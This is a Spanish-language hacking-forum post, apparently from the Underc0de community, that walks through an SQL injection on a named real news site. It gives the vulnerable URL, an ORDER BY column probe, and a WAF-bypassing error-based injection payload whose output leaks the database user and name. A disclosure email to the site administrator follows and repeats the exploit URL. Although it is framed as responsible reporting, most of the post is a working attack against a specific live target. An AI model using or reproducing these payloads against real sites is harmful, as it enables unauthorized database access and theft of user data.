(http://i48.tinypic.com/in48dy.png)
Web: http://gente.com.ar/flash/diosa/listar.php?ID='12928
Vector: http://gente.com.ar/flash/diosa/listar.php?ID=-725+ORDER+BY+1,2,3,4,5 (Salta el error tiene 4)
Tiene WAF
Despues de no poder rendirme ante el WAF (Cuestion de Honor) y peliando un rato con el lo bypassie.
(http://i47.tinypic.com/20qfg5e.png)
Vector=http://gente.com.ar/flash/diosa/listar.php?ID=-1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)--
user(): Error: Duplicate entry '
[email protected]~1' for key 1
database: Error: Duplicate entry 'gente~1' for key 1
Excelente HD! ahi envie el reporte
CitarEstimado administrador de gente.com.ar,
Pertenezco a una comunidad orientada a la seguridad informatica llamada Underc0de (www.underc0de.org) somos autodidactas, y nos gusta encontrar fallas, reportarlas y brindamos soportes para que puedan solucionarlas.
Le escribo para informarle que uno de nuestros usuarios apodado HD_Breaker reporto un bug de seguridad en su sitio. Se trata de un SQLi
http://gente.com.ar/flash/diosa/listar.php?ID=%2712928
A partir de esto, se podria tener los datos de usuarios/administradores almacenados en su base de datos llamada "gente" para luego hackear el sitio.
Con el fin de que esto no ocurra, nosotros les estamos avisando de esta falla en su sitio.
Nosotros no cobramos dinero, simplemente les agradeceriamos que colocara nuestro link en el footer de su sitio (sin compromiso)
A demas de esto, tambien este usuario reporto que su sitio tiene WAF
http://gente.com.ar/flash/diosa/listar.php?ID=-1+or+1+group+by+concat_ws%280x7e,version%28%29,floor%28rand%280%29*2%29%29+having+min%280%29--
Si necesita ayuda o soporte, no dude en contactarnos!
Saludos Corditales
Underc0de Security Research